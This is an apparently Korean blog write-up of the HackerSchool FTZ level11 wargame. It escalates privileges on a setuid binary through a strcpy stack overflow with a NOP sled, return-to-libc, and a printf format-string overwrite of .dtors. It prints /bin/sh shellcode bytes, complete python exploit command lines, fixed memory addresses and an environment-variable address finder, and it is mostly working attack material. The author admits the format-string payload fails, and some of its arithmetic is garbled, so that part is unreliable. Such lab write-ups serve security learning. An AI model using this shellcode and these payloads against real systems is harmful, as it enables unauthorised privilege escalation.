HackerSchool_level11

keyword : strcpy bof
keyword : printf Format String
keyword : NOP

---

level11 - Write Up(NOP)

힌트가 코드네요... 위 코드를 보면 argv라는 main인자의 값을 받아서 출력하네요
setreuid가 있기에 level12로 향하는 비번의 권한을 취득할 수 있답니다.

BOF에 취약한 대표적인 함수가 strcpy이니까 bof로 main의 ret를 조작하면 되겠네요
참고로 저 함수에서 bof 취약점을 막을려면 strncpy로 하면 되요 ㅎ

그럼 리버싱으로 확인해볼까요?

음.. 보시면 프롤로그가 위와 같이 나와있으며, <main+3>의 어셈 코드가 $0x108, %esp로써
아까 코드에서 본 char str[256]의 크기를 저렇게 esp로써 공간 할당한거네요

0x108를 변환하면.. 264byte로 나오네요
그래서 실제로 입력한 buf값과 크기가 다를 수 있으니까 항상 확인 ㄱㄱ

여기선 모듈.. 이라는게 딱히 설치 안되어 있는거 같으니까 바로 shellcode를 찾아서 넣어봅시다.
참고로 shellcode(268byte; buf[264]+sfp[4]) + ret(4byte)로 하면 되겠죠?
참고로 위에 있는 strcpy의 반환값 즉, ret를 넣으면 되겠죠?(거기에서 쉘 코드를 넣어줄거니까..)

Offensive Security’s Exploit Database Archive

여기서 shellcode를 얻을 수 있어요.. 근데 보니까 뭐 우리가 원하는 264byte 크기의
shellcode는 없으니까(잘 안 찾아봤다만..) dummy를 채워서 해야겠네요

근데 문제는 저기에 있는 쉘 코드들이 잘 안 통하네요.. 그래서 구글링을 또 하게 됬죠
그러면서 쉘 코드 모아놓은 정리된 블로그를 올려드릴께요

쉘코드 메모

25byte shellcode

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

자.. 저기에 가장 기본적으로 쉘을 띄우는 코드를 사용해봅시다.

참고로 저는 더 자세히 어셈이 안 되더라고요...
이건.. 무슨;; 이전 level10이랑 똑같은 문제 같아서 tmp로 복사해서 진행해야겠네요 하..

짜란! 이제 될 거예요 그럼 한 모습을 설명하기보단 캡처한 모습을 나열해서 보여드릴께요
아마 금방 이해되실 거예요

01

참고로 2번째는 아무렇게나 넣어도 상관 없는게.. 어짜피 esp 위치 찾는거라서 히히

`python -c 'print "\x90"*243 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "AAAA"'`

자.. 위와 같이 했어도 아마 안될거예요 바로 ASLR이 걸려있거든요..
하.. 어쩐지 계속 바뀌더라 후.. 근데 반복문으로 계속 돌려보시면 언젠가 될지도 ㅋㅋㅋ
그렇게 풀 수도 있는데 비추긴 해요

---

level11 - Write Up(RTL)

ASLR의 관한 내용과 우회 방법은 아래 두 개의 링크에서..

Mitigation: NX & ASLR

Background: Library - Static Link vs. Dynamic Link

인자에 넣는 부분을 RET를 우회할려고 했으나.. ASLR이 걸려있기에 RTL로 해야겠죠

ldd의 명령어와 nm 명령어를 사용하여(gdb 툴이 제가 쓰던데로 커스텀이 안되어 있어서 ㅠ)
위와 같이 사용하면. 0x4203f2c0으로 위치를 확인 할 수 있습니다.(__libc_..랑 위치가 같겠죠?)

ldd 명령어

nm 명령어

자.. 그럼 넣어서 확인을 해봅시당

그 전에 RTL이니까 해당 system 문자열에 들어갈 수 있는 문자열 즉, binsh의 문자열도 주소를 확인해서 넣거나,
입력해서 넣어야겠죠.. 정말 쉽게 가는 법이 없네요 ㅠ

자.. strings라는 명령어도 사용할께요 사용법은 위에 명시되어 있으니까 참고 바래요

참고로 libc가 똑같은거 쓰니까..(0x42가 생략했네? 4byte가 있어야하니까 ㅎ) 0x42127ea4겠죠!!
자.. 그럼 다 끝났죠

exploit code 형식

dummy(268{buf[264] + sfp[4]}) + system_addr(8) + dummy(4) + Binsh(4)

왜 저런 식으로 구성되는지는.. 아래 링크에서 확인해주세요
근데 Canary도 포함되어 있어서.. 죄송해요 너무 지쳐서 ㅠ

Exploit Tech: Return to Library

밑에 자료는 ROP 혹은 Chaining RTL의 방식으로도 되는데 심적으로 어지러워서 ㅠ

Exploit Tech: Return Oriented Programming

그럼 코드를 확인해보면...

./attackme `python -c 'print "\x90"*268 + "\xc0\xf2\x03\x42" + "\x90"*4 + "\xa4\x7e\x12\x42"'`

음.. level12가 되야하는데.. 안되네요??
아마도 setUID가 안된거 같은데 tmp라서 그런거 같네요 나와서 권한 확인을 해보면..

사용자 계정이 다른 걸 확인할 수 있죠 그러면 level12가 되어 있는 attackme에 접근해서 코드를 적용하면..

level12 : it is like this

---

level11 - Write Up(FSB)

위와 같이 printf에 관한 format의 설정을 하나도 지정을 안 했기에 취약하답니다.
참고로 해당 취약점은 C계열에서 주로 발생되며, 원인은 프로그래머의 실수입니당

인자를 무엇으로 출력할건지 해당 지정을 안 했기에 우리가 임의로 지정할 수 있는 것이겠죠
그럼 바로 실습으로 넘어갈까요? 설명은 위에서 다 했으니까

위와 같이 지정을 안 해준다면 저희가 지정한 format의 형식에 따라 출력한다는 걸 확인
그러하다면 저희의 상황에 맞게 정보를 구해볼까요

그러하다면 printf의 function의 종류 중에서 이러한 오류가 이러나는 이유가 뭘까요?
바로 printf의 함수가 포맷 스트링의 서식 지정자의 개수를 확인 X 이기 때문이죠

즉, printf의 포맷 스트링에 대한 모든 인자가 전달된다는 가정하에 실행되기에 스택에 값을 찾고 출력
이러한 형식으로 출력되기에 위험한 취약점이겠죠

Format String Bug; FSB Tip

%x와 %n이 가장 보편적으로 중요합니다. 
%x : 16진수로 출력│%n : 자신이 나오기 전까지의 문자를 읽기 & 자신이 가르키는 주소에 저장
위 두가지를 통해 해당 주소의 위치와 명령어(Exploit Code) 삽입 등이 가능하죠

참고로 %Nc(or %N$c로 되야하는데 안되네;;)로 N의 값만큼 읽어드릴 수도 있어요

물론 다양한 방식으로도 접근 가능하답니다(%p 등이 있죠)

이런 식으로 4번째 인자에 우리가 넣었던 문자 AAAA가 출력된다는 것을 확인할 수 있습니다.
그럼 해당 인자가 어디까지 받아드리는지도 확인해봅시다.

위 이미지를 보시면 4번째에 인자 이후에는 계속 같은 내용이 반복된다는 점을 확인 할 수 있습니다.
그러기에 4번째 인자가 실행되는 권한으로써 ret의 주소의 위치로써 활용한다면..
level12로 권한 상승할 수 있겠죠!(해당 주소로 shellcode를 실행시킨다면 level12로 실행될거니까)

그러면 어떤 식으로 메모리에 적재되고 어떤 식으로 해킹이 진행 되는지 짧게 알아보고 넘어갑시다.
FSB의 형식은 어떻게 될까..

위 형식을 보시면 알 수 있지만 printf의 전 단계에서 브포를 걸고 확인을 한 모습이며,
아래 메모리 예상도를 보시면서 설명을 이어가자면..

sfp(main쪽의 EBP )

ret(main 쪽)

break point

dummy

↓

AAAA

↓

sfp

ret

로써 메모리가 구성된다고 추정할 수 있겠네요 그러하다면
해당 원하는 system(혹은 쉘 코드의) 주소를 넣고 뒤에 더미값으로 한다면 어떻게 될까요?

예시로 임의의 주소인 0xffeeddcc에 뒤에 서식 지정자로써 %n과 같은 서식지정자를 넣는다면
원하는 주소에 있는 코드가 성공적으로 실행되겠죠

물론 권한이 임의의 주소에 뭐 넣은 것도 없고 권한이 안되서 열람이 안되는거 같은데
저런식으로 다음으로 넘겨도 문제 없이 잘 되는거 같죠?

그럼 FSB에 대하여 대충 안 거 같으므로 시나리오가 아래와 같겠죠

1. printf에서 %문자(서식지정자)당 메모리는 4byte 뒤로 가서 데이터를 읽어 처리함
2. %n을 사용하면 일어온 값을 출력함
3. %Nc를 사용하면 N 만큼 출력 문자 수를 만듬
4. dtor 호출 주소(뒤에 설명)를 shellcode의 주소로 변경
   - dtor와 같은 경우는 고정적인 위치에서 명령어 실행이기에 유용하게 사용되겠죠

그럼 해당 코드에 쉘 코드를 불러드려서 그 주소를 찾고 확인해볼까요?
위에 쉘 코드 주소 나왔죠? 환경변수에 넣어서 꺼내는 형식으로 합시다

export Shellcode=$(python -c 'print("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80")')

참고로 저기 export Shellcode=$(..)이런식으로 = 사이에 공백있으면 에러날 수 있으니까
어지간하시면 붙여서 사용하시는게 좋을 거 같아요 참고 자료에서도 그런 식으로 설명하네요

이런 식으로 입력했어요

솔직히 env.. 찾느라 삽질 약간 했는데
저희가 넣은 Shellcode가 막 뭉개져있네요 그럼 주소 확인을 위해서..

//level11_Shellcode_addr_check
//
#include <stdio.h>
#include <stdlib.h>
 
int main(int* argc, char** argv[]){
        char *pathvar;
 
        pathvar = getenv("Shellcode");
        printf("pathvar addr : %p", pathvar);
}
 

확인해보면.. 주소가 0xbffffc20이네요!

마지막으로 이 printf의 끝나는 ret값의 주소만 구하면 다 끝나네요

nm 명령어로 해당 확인을 하여 main의 소멸자를 확인

.ctors 속성의 함수는 main() 전에 실행
.dtors 속성의 함수는 main() 종료 후에 실행

0x08049610 주소가 Dtors_End겠네요 

다 끝났네요 exploit 코드를 짜실 때 생각한 순차적으로 설명을 한다면
아 밑에 링크는 밑에 부분에서 약간 메모리 나누는 기준 이런걸 모르겠다 그럼 들어가시면 되요

Computer Architecture

shellcode addr : 0xbffffc20 [\x20\xfc\xff\xbf]
Dtors : 0x08049610 [\x10\x96\x04\x08]

가장 이상적인 형식

[dtor의 주소] + (%8x)*3 + %[쉘 코드 주소; 0xbffffc10]c + %n

으로 우리가 원하는 구상이 되야지만 문제는 바로 쉘 코드를 넣는 부분..
여기서 "0xbffffc20"이라는 숫자는 CS(Computer Science)부분에서 변환 하는 도중에..
메모리 적제에서 다른 숫자로 변하기에 큰 오류가 생길 수 있습니다.

 0xbfffff20는 10진수로 3,221,225,248인데
int형의 범위는 -2,147,483,648 ~ 2,147,438,647 이기 때문에 제대로 인식을 하지함

2. 데이터의 종류(진수, 보수, 논리 게이트)

자세한 이유는 위에 링크로.. 여기선 설명하는게 너무 길어지니까 위는 간단한 설명
추가적으로 공부하고 싶다면 CS부분을 공부해주세요 ㅎ

기본적인 틀(메모리에 맞게 끊어서.. 대부분 이렇게 함)

[dtor 상위 2byte] +  [- 하위 2byte] + (%8x)*3 + %[shell 하위 2byte addr]c + %n + %[- 상위 2byte] + %n

리틀 엔디안 형식으로 넣을거기에 이런 형식으로 나눈거 아실거예요
그러면 뭔가 어떻게 해야할지 감이 안 올 수 있으므로

[dtor 상위] ← [쉘 하위 2byte; \xff\xbf\x00\x00; 65471(10진수)]
[dtor 하위] ← [쉘 상위 2byte; \x20\xfc\x00\x00; 8444(10진수)]

보시면 dtor의 주소를 쪼갰으므로 dtor 상위 주소를 넣기 위해서 %n을 추가 즉, 4byte 만큼 메모리를 추가됨
그러기에 4byte를 땡겨야지 dtor에 각각 데이터가 잘 들어가겠죠? 그래서 (%8x)*(3-1)

보완

[dtor 상위 2byte] + [4byte dummy] + [- 하위 2byte] + (%8x)*2 + %[shell 하위 2byte addr]c + %n + %[- 상위 2byte] + %n

그리고 쉘 하위 2byte넣을라고 %n으로 4byte를 땡겼으니까 쉘 상위 넣을려면
원래 dtor의 하위 바이트의 위치를4byte 밀어줘야 정상적으로 인자들이 입력되겠죠?
솔직히 이해하기가 상당 어렵기 때문에 천천히 생각해주시고 모르시면 댓글로 해주세요

그럼 payload의 시나리오는 대충 구성했어요
(실제로는 메모리 구성상 실제 값을 넣을 때 다시 입력해야할 부분도 있지만..)

---

Payload Exploit

shellcode addr : 0xbffffc20 [\x20\xfc\xff\xbf]
Dtors : 0x08049610 [\x10\x96\x04\x08]

[dtor 상위] ← [쉘 하위 2byte; \xff\xbf\x00\x00; 65471(10진수)]
[dtor 하위] ← [쉘 상위 2byte; \x20\xfc\x00\x00; 8444(10진수)]

./attackme `python -c 'print "\x10\x96\x04\x08" + "AAAA" + "\x12\x96\x04\x08" + "%8x%8x" + "%64514c" + "%n" + "%50145c" + "%n"'`

위와 같이 짯으며 쉘 코드의 인자를 넣을때 주의점이 그때까지 출력한 문자의 수만큼 빼야해요
(원본 값 - 출력된 값) + 출력된 값 = 원본값

그러므로 dotr addr(8) + dummy(4) + %8x*2(16) = 24만큼 빼면 되요
65471 - 24 = 64514, 뒤에도 똑같이 해야하는데 크기가 안되서 음수 즉, 보수 값이 나오잖아요

그러므로 CS를 배우셨다면 아시겠지만 보수의 값이 있기에 최상단에 1을 추가해 1fc20 - ffxb = 50145로
나와요.. 이건 수정을 계속 하다보니까.. 그런데 해보면.. 안되더라고요 나중에 다시 할께요 ㅠ

---

다소 설명이 불친절한 이유는 계속 날아가서 화가 너무 났는데.. ㅠ 어쩔 수 없죠
저 까먹을 수 있으니까 다양한 방법으로 풀고 싶다면 댓글로든 모든 재촉해주세요 그럼 이만

---

참고 자료

BOF - 환경변수 이용하기

ctors, dtors 영역

getenv() — 환경 변수 검색

[FTZ] level 11(FSB, DTOR)

 

[FTZ] level 11(FSB, DTOR)

 

참고 이미지

Sea Level free icons designed by surang

 

[리눅스 명령어] ldd - 라이브러리 의존성 확인